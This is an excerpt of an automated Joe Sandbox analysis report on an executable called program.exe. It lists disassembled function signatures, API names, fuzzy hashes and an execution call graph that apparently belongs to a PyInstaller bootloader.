                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF516C73A0C3868AEB648B299854A6877A0FB55B98F144136DB8D87BE5CF3CE451C701
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF6B750352C,?,00000000,00007FF6B7503F23), ref: 00007FF6B7507F32
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                              • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                              • Instruction ID: 2d830b80e12cbc9dbe8d8da00474cc222322cf14f104e082e1db06b220a04172
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D131E66271DAC145EA218B28E4503EA6358EF84BE8F440631EF6D877E9DF3CD6458700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                              • Instruction ID: 0951eebf42bbb2f49d1416f930d09a427540ecae0a2d2a0830ecf9075305326d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F921AE63B0CB8182E7219B58F8447EA63A4FB88784F400136EF8D97669EE3CE245C740
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction ID: 44dc6140cc07823e08c36d7133b7fb63651f8aa41e4be9516083f75f5c8f87c4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAD1E073B0CA918AE711CF6AC4402AC37A1FB55799B444226DF4E97FE9EE39E046C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                              • Instruction ID: 2480a9834041957690d72a35a3b3ad33d18c6458603f197fed6fc41226b2a31f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451A573F092218AEB14DF689D556BC3765AB4436AF500235DF1E96EF5DF3CAC428600
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
• Instruction ID: 803bd9ca3fe3c0d96ccc62fc5c04e7848bbf9edbc97e47014380b2b047fb8bdb
• Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
• Instruction Fuzzy Hash: 8C516A23E086518AFB10DFB994503BD27A1AB48B99F248535EF4D9BAA9DF38E4418701
APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction ID: 6214889d40ec9376fab55ed24eb7b1ce0963c1cda315b5dcd7b41a35f671fae4
• Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction Fuzzy Hash: EB110C23F0C14642F655876DE98427953A2FF88784F448030DB4947BA9DD3DE6C58240
APIs
Strings
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
• Instruction ID: f9009eb84b4961b74f439333b38a427d6c0a88f659bf914f75efe23bf268949c
• Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
• Instruction Fuzzy Hash: F941E623B1C28256FB659B29954137A67A0EF80BA4F144275EF5D86AF5DF3CD8818B00
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B7519046
  • Part of subcall function 00007FF6B751A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
  • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6B750CBA5), ref: 00007FF6B7519064
Strings
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\program.exe
• API String ID: 3580290477-2554842565
• Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
• Instruction ID: b677119557b6f86b8c06a5fb58fd3cc327bce63cb1526ffe50d729b2e8220c3e
• Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
• Instruction Fuzzy Hash: 90418937A0CA628AEB159F2998401BD67A4EF44BD1B554039EB4E87FA5DF3CE891C340
APIs
Strings
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
• Instruction ID: a294a28bbd36a8039f0d9a75b480996b95cbcfc70026829bcab52d0d8dc4ab8f
• Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
• Instruction Fuzzy Hash: 2F41B123A1CA9585DB609F2AE4443AA67A1FB98784F444135EF4DC7BA8EF3DD441CB40
APIs
Strings
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
• Instruction ID: 17d1cb73cfb60a2195a6cc62f711a24f1eb5c2635f239ee9431842b37d667d3d
• Opcode Fuzzy Hash: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
• Instruction Fuzzy Hash: EE21B163A0C69181EB209F19D84427D73B1FB88B85F864139DB8D83AE4DF7CE985CB41
APIs
Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction ID: 46f69375e5e0cb36e2d3d13817035f4875b358d53a28a2436d4d03ae55c646c2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D110A33618B8182EB618F19E84025977A5FB88B88F584234DB8D47764DF3DD5528700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction ID: faa2155f1e93b51dfa73d5b32b26958f61afaba14c8c3fe0174856b584320da4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1301A223A1C20386F730AF68946127E23A0EF48744F841036D74DC66B5EF3CE5458F24

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:2.9%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:1.2%
                                                                                                                                                                                                                                              Total number of Nodes:812
                                                                                                                                                                                                                                              Total number of Limit Nodes:45
                                                                                                                                                                                                                                              execution_graph 87830 7ffe0077fd40 87831 7ffe0077fd50 87830->87831 87832 7ffe0077fd62 87831->87832 87836 7ffe007614bf 87831->87836 87840 7ffe007bf070 87831->87840 87844 7ffe00761df7 87831->87844 87836->87832 87837 7ffe007be960 87836->87837 87838 7ffe007bf1c1 SetLastError 87837->87838 87839 7ffe007bf1d5 87837->87839 87838->87839 87839->87832 87841 7ffe007bf180 87840->87841 87842 7ffe007bf1c1 SetLastError 87841->87842 87843 7ffe007bf1d5 87841->87843 87842->87843 87843->87832 87844->87832 87845 7ffe007beaa0 87844->87845 87846 7ffe007bf1c1 SetLastError 87845->87846 87847 7ffe007bf1d5 87845->87847 87846->87847 87847->87832 87848 7ffe01385220 87850 7ffe01385258 87848->87850 87851 7ffe013852ae 87848->87851 87851->87850 87852 7ffe01384c70 87851->87852 87853 7ffe01384ce4 87852->87853 87854 7ffe01384ef4 00007FFE1A463010 87853->87854 87855 7ffe01384d5f 87853->87855 87856 7ffe01384f14 87853->87856 87854->87856 87855->87851 87857 7ffe01384fa5 00007FFE1A463010 87856->87857 87858 7ffe01384fba 87856->87858 87857->87858 87858->87855 87860 7ffe01323790 87858->87860 87863 7ffe013237c7 87860->87863 87861 7ffe01323829 87861->87858 87863->87861 87865 7ffe01323370 87863->87865 87871 7ffe01317270 00007FFE1A463010 00007FFE1A463010 ReadFile 00007FFE1A463010 87863->87871 87866 7ffe01323381 87865->87866 87869 7ffe013234a4 87866->87869 87872 7ffe0131a0d0 87866->87872 87868 7ffe013233a2 87868->87869 87878 7ffe01317270 00007FFE1A463010 00007FFE1A463010 ReadFile 00007FFE1A463010 87868->87878 87869->87863 87871->87863 87874 7ffe0131a0f2 87872->87874 87876 7ffe0131a125 87872->87876 87874->87868 87875 7ffe0131a15d 87875->87874 87883 7ffe01317270 00007FFE1A463010 00007FFE1A463010 ReadFile 00007FFE1A463010 87875->87883 87876->87874 87876->87875 87879 7ffe01318050 
87876->87879 87878->87869 87880 7ffe0131807f 87879->87880 87881 7ffe0131809c 87880->87881 87884 7ffe0130d9e0 87880->87884 87881->87875 87883->87874 87885 7ffe0130da0d 87884->87885 87889 7ffe0130da5a 87884->87889 87886 7ffe0130da43 00007FFE1A463010 87885->87886 87887 7ffe0130da23 00007FFE1A463010 87885->87887 87886->87889 87890 7ffe0130da28 87887->87890 87888 7ffe0130da83 ReadFile 87888->87889 87888->87890 87889->87888 87889->87890 87890->87881 87891 7ff6b750cc3c 87912 7ff6b750ce0c 87891->87912 87894 7ff6b750cd88 88063 7ff6b750d12c 7 API calls 2 library calls 87894->88063 87895 7ff6b750cc58 __scrt_acquire_startup_lock 87897 7ff6b750cd92 87895->87897 87900 7ff6b750cc76 __scrt_release_startup_lock 87895->87900 88064 7ff6b750d12c 7 API calls 2 library calls 87897->88064 87899 7ff6b750cc9b 87900->87899 87902 7ff6b750cd21 87900->87902 88060 7ff6b7519b2c 45 API calls 87900->88060 87901 7ff6b750cd9d __CxxCallCatchBlock 87918 7ff6b750d274 87902->87918 87904 7ff6b750cd26 87921 7ff6b7501000 87904->87921 87909 7ff6b750cd49 87909->87901 88062 7ff6b750cf90 7 API calls 87909->88062 87911 7ff6b750cd60 87911->87899 87913 7ff6b750ce14 87912->87913 87914 7ff6b750ce20 __scrt_dllmain_crt_thread_attach 87913->87914 87915 7ff6b750cc50 87914->87915 87916 7ff6b750ce2d 87914->87916 87915->87894 87915->87895 87916->87915 88065 7ff6b750d888 7 API calls 2 library calls 87916->88065 88066 7ff6b752a4d0 87918->88066 87920 7ff6b750d28b GetStartupInfoW 87920->87904 87922 7ff6b7501009 87921->87922 88068 7ff6b7515484 87922->88068 87924 7ff6b75037fb 88075 7ff6b75036b0 87924->88075 87930 7ff6b750383c 88174 7ff6b7501c80 87930->88174 87931 7ff6b750391b 88179 7ff6b75045c0 87931->88179 87935 7ff6b750385b 88147 7ff6b7508830 87935->88147 87938 7ff6b750396a 88202 7ff6b7502710 54 API calls _log10_special 87938->88202 87940 7ff6b750388e 87948 7ff6b75038bb __vcrt_freefls 87940->87948 88178 7ff6b75089a0 40 API calls __vcrt_freefls 87940->88178 87942 7ff6b750395d 87943 7ff6b7503984 87942->87943 87944 7ff6b7503962 
87942->87944 87946 7ff6b7501c80 49 API calls 87943->87946 88198 7ff6b751004c 87944->88198 87949 7ff6b75039a3 87946->87949 87950 7ff6b7508830 14 API calls 87948->87950 87957 7ff6b75038de __vcrt_freefls 87948->87957 87954 7ff6b7501950 115 API calls 87949->87954 87950->87957 87952 7ff6b7503a0b 88205 7ff6b75089a0 40 API calls __vcrt_freefls 87952->88205 87956 7ff6b75039ce 87954->87956 87955 7ff6b7503a17 88206 7ff6b75089a0 40 API calls __vcrt_freefls 87955->88206 87956->87935 87959 7ff6b75039de 87956->87959 87963 7ff6b750390e __vcrt_freefls 87957->87963 88204 7ff6b7508940 40 API calls __vcrt_freefls 87957->88204 88203 7ff6b7502710 54 API calls _log10_special 87959->88203 87960 7ff6b7503a23 88207 7ff6b75089a0 40 API calls __vcrt_freefls 87960->88207 87964 7ff6b7508830 14 API calls 87963->87964 87965 7ff6b7503a3b 87964->87965 87966 7ff6b7503b2f 87965->87966 87967 7ff6b7503a60 __vcrt_freefls 87965->87967 88209 7ff6b7502710 54 API calls _log10_special 87966->88209 87980 7ff6b7503aab 87967->87980 88208 7ff6b7508940 40 API calls __vcrt_freefls 87967->88208 87970 7ff6b7508830 14 API calls 87971 7ff6b7503bf4 __vcrt_freefls 87970->87971 87972 7ff6b7503d41 87971->87972 87973 7ff6b7503c46 87971->87973 88223 7ff6b75044e0 49 API calls 87972->88223 87974 7ff6b7503cd4 87973->87974 87975 7ff6b7503c50 87973->87975 87977 7ff6b7508830 14 API calls 87974->87977 88210 7ff6b75090e0 59 API calls _log10_special 87975->88210 87984 7ff6b7503ce0 87977->87984 87979 7ff6b7503d4f 87982 7ff6b7503d65 87979->87982 87983 7ff6b7503d71 87979->87983 87980->87970 87981 7ff6b7503c55 87985 7ff6b7503c61 87981->87985 87986 7ff6b7503cb3 87981->87986 88224 7ff6b7504630 87982->88224 87988 7ff6b7501c80 49 API calls 87983->87988 87984->87985 87989 7ff6b7503ced 87984->87989 88211 7ff6b7502710 54 API calls _log10_special 87985->88211 88221 7ff6b7508660 86 API calls 2 library calls 87986->88221 88001 7ff6b7503d2b __vcrt_freefls 87988->88001 87991 7ff6b7501c80 49 API calls 87989->87991 87997 7ff6b7503d0b 87991->87997 
87993 7ff6b7503dc4 88160 7ff6b7509390 87993->88160 87994 7ff6b7503cbb 87995 7ff6b7503cbf 87994->87995 87996 7ff6b7503cc8 87994->87996 87995->87985 87996->88001 88000 7ff6b7503d12 87997->88000 87997->88001 87999 7ff6b7503dd7 SetDllDirectoryW 88005 7ff6b7503e0a 87999->88005 88008 7ff6b7503e5a 87999->88008 88222 7ff6b7502710 54 API calls _log10_special 88000->88222 88001->87993 88002 7ff6b7503da7 SetDllDirectoryW LoadLibraryExW 88001->88002 88002->87993 88007 7ff6b7508830 14 API calls 88005->88007 88006 7ff6b7503808 __vcrt_freefls 88212 7ff6b750c550 88006->88212 88017 7ff6b7503e16 __vcrt_freefls 88007->88017 88009 7ff6b7504008 88008->88009 88010 7ff6b7503f1b 88008->88010 88011 7ff6b7504035 88009->88011 88012 7ff6b7504012 PostMessageW GetMessageW 88009->88012 88235 7ff6b75033c0 121 API calls 2 library calls 88010->88235 88165 7ff6b7503360 88011->88165 88012->88011 88014 7ff6b7503f23 88014->88006 88015 7ff6b7503f2b 88014->88015 88236 7ff6b75090c0 LocalFree 88015->88236 88020 7ff6b7503ef2 88017->88020 88024 7ff6b7503e4e 88017->88024 88234 7ff6b7508940 40 API calls __vcrt_freefls 88020->88234 88024->88008 88227 7ff6b7506dc0 54 API calls _set_fmode 88024->88227 88027 7ff6b750404f 88238 7ff6b7506fc0 FreeLibrary 88027->88238 88032 7ff6b750405b 88033 7ff6b7503e6c 88228 7ff6b7507340 117 API calls 2 library calls 88033->88228 88037 7ff6b7503e81 88039 7ff6b7503e85 88037->88039 88041 7ff6b7503ea2 88037->88041 88229 7ff6b7506e00 120 API calls _log10_special 88037->88229 88039->88008 88232 7ff6b7502a50 54 API calls _log10_special 88039->88232 88041->88039 88230 7ff6b75071b0 125 API calls 88041->88230 88046 7ff6b7503ee0 88233 7ff6b7506fc0 FreeLibrary 88046->88233 88047 7ff6b7503eb7 88047->88039 88231 7ff6b75074f0 55 API calls 88047->88231 88060->87902 88061 7ff6b750d2b8 GetModuleHandleW 88061->87909 88062->87911 88063->87897 88064->87901 88065->87915 88067 7ff6b752a4c0 88066->88067 88067->87920 88067->88067 88071 7ff6b751f480 88068->88071 88069 7ff6b751f4d3 88239 7ff6b751a814 37 API 
calls 2 library calls 88069->88239 88071->88069 88072 7ff6b751f526 88071->88072 88240 7ff6b751f358 71 API calls _fread_nolock 88072->88240 88074 7ff6b751f4fc 88074->87924 88241 7ff6b750c850 88075->88241 88078 7ff6b7503710 88243 7ff6b7509280 FindFirstFileExW 88078->88243 88079 7ff6b75036eb GetLastError 88248 7ff6b7502c50 51 API calls _log10_special 88079->88248 88082 7ff6b7503706 88087 7ff6b750c550 _log10_special 8 API calls 88082->88087 88084 7ff6b7503723 88249 7ff6b7509300 CreateFileW GetFinalPathNameByHandleW CloseHandle 88084->88249 88085 7ff6b750377d 88251 7ff6b7509440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 88085->88251 88090 7ff6b75037b5 88087->88090 88089 7ff6b750378b 88089->88082 88252 7ff6b7502810 49 API calls _log10_special 88089->88252 88090->88006 88097 7ff6b7501950 88090->88097 88091 7ff6b7503730 88092 7ff6b7503734 88091->88092 88093 7ff6b750374c __vcrt_FlsAlloc 88091->88093 88250 7ff6b7502810 49 API calls _log10_special 88092->88250 88093->88085 88096 7ff6b7503745 88096->88082 88098 7ff6b75045c0 108 API calls 88097->88098 88099 7ff6b7501985 88098->88099 88100 7ff6b7501c43 88099->88100 88102 7ff6b7507f90 83 API calls 88099->88102 88101 7ff6b750c550 _log10_special 8 API calls 88100->88101 88103 7ff6b7501c5e 88101->88103 88104 7ff6b75019cb 88102->88104 88103->87930 88103->87931 88146 7ff6b7501a03 88104->88146 88253 7ff6b75106d4 88104->88253 88106 7ff6b751004c 74 API calls 88106->88100 88107 7ff6b75019e5 88108 7ff6b75019e9 88107->88108 88109 7ff6b7501a08 88107->88109 88260 7ff6b7514f08 11 API calls _set_fmode 88108->88260 88257 7ff6b751039c 88109->88257 88112 7ff6b75019ee 88261 7ff6b7502910 54 API calls _log10_special 88112->88261 88115 7ff6b7501a45 88120 7ff6b7501a5c 88115->88120 88121 7ff6b7501a7b 88115->88121 88116 7ff6b7501a26 88262 7ff6b7514f08 11 API calls _set_fmode 88116->88262 88118 7ff6b7501a2b 88263 7ff6b7502910 54 API calls _log10_special 88118->88263 88264 7ff6b7514f08 11 API calls _set_fmode 88120->88264 88122 7ff6b7501c80 49 
